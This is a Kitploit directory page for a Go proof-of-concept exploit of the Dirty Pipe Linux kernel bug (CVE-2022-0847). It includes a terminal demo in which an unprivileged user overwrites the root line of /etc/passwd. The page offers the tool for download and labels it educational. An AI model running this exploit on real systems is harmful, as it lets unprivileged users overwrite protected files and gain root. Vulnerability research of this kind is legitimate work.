Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-0847 — Go-based proof-of-concept exploit for CVE-2022-0847 (Dirty Pipe) demonstrating arbitrary file overwrite via uninitialized pipe buffers, intended for educational vulnerability research. | Kitploit
Tools/GitHubGitHub/knqyf263/cve-2022-0847
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationBinary Exploitation
GitHubknqyf263/cve-2022-0847

CVE-2022-0847

Go-based proof-of-concept exploit for CVE-2022-0847 (Dirty Pipe) demonstrating arbitrary file overwrite via uninitialized pipe buffers, intended for educational vulnerability research.

View Repository
46914 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-0847

The Dirty Pipe Vulnerability

For educational purposes only

root@kitploit:~
┌──(vagrant㉿kali)-[~]
└─$ ls -al /etc/passwd
-rw-r--r-- 1 root root 3124 Mar  8 08:47 /etc/passwd

┌──(vagrant㉿kali)-[~]
└─$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh

┌──(vagrant㉿kali)-[~]
└─$ echo foo > /etc/passwd
zsh: permission denied: /etc/passwd

┌──(vagrant㉿kali)-[~]
└─$ go run main.go /etc/passwd 1 foo
2022/03/08 08:48:03 It worked

┌──(vagrant㉿kali)-[~]
└─$ head -n 1 /etc/passwd
rfoo:x:0:0:root:/root:/usr/bin/zsh
Download Tool